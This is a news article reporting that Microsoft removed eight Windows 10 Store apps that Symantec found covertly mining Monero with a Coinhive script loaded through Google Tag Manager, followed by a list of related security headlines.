Microsoft has removed from the official Microsoft Store eight Windows 10 apps that had been caught mining the Monero cryptocurrency behind users' backs for the benefit of the apps' developers.
The names of the eight apps are Fast-search Lite, Battery Optimizer (Tutorials), VPN Browsers+, Downloader for YouTube Videos, Clean Master+ (Tutorials), FastTube, Findoo Browser 2019, and Findoo Mobile & Desktop Search.
The apps were developed by three developers, namely DigiDream, 1clean, and Findoo. US cyber-security firm Symantec, which discovered the malicious apps last month, says evidence they uncovered in the applications' source code and adjacent domains led them to believe all eight had been developed by the same person or group, despite the different names.
According to a Symantec technical report shared with ZDNet, all apps worked in a similar fashion. All loaded the Google Tag Manager (GTM) library within their source code, through which they later downloaded and executed the actual malicious payload.
"A malicious URL with mining script was detected, and we backtracked to find these applications," Tommy Dong, Senior Principal Software Engineer at Symantec, told ZDNet. "Symantec AV can convict generic JS-based cryptocurrency mining disregarding any domain."
Users who installed these apps over the past few months would have seen their CPU usage go through the roof, as the Coinhive miner would consume all available resources to mine Monero for the app devs.
"There is no throttling which means it uses up 100% of user's CPU time. Opening the app will cause a detectable spike in CPU usage," Dong told us.
Because the Microsoft Store doesn't list install count stats, it's impossible to say how many users were affected, however, Symantec pointed out that the apps had thousands of reviews, suggesting they were somewhat popular --although this can't be extremely accurate either, as there are online services that sell fake reviews on the Microsoft Store.
The apps are what security researchers would normally call cryptojacking apps or cryptominers. Cryptojacking, is a cyber-security-related term that is used to describe the practice of mining cryptocurrency behind a user's back.
Because of the sudden rise in cryptocurrency prices that occurred in mid-2017, cryptojacking --first done inside browsers and later using dedicated software on servers-- is one of today's most prevalent forms of cybercrime, with some groups making millions of US dollars in profits.
Related security coverage:
- Cryptojacking: One in three organisations say they've been hit with mining malware
- Dirty Sock vulnerability lets attackers gain root access on Linux systems
- Google is running an auto-update-to-HTTPS experiment in Chrome
- Another WordPress commercial plugin gets exploited in the wild
- New macOS security flaw lets malicious apps steal your Safari browsing history
- Google Play Store app rejections up 55% from last year, app suspensions up 66%
- Cryptomining malware spread via US, UK and Australian government sites TechRepublic
- Google bans cryptocurrency mining extensions for Chrome CNET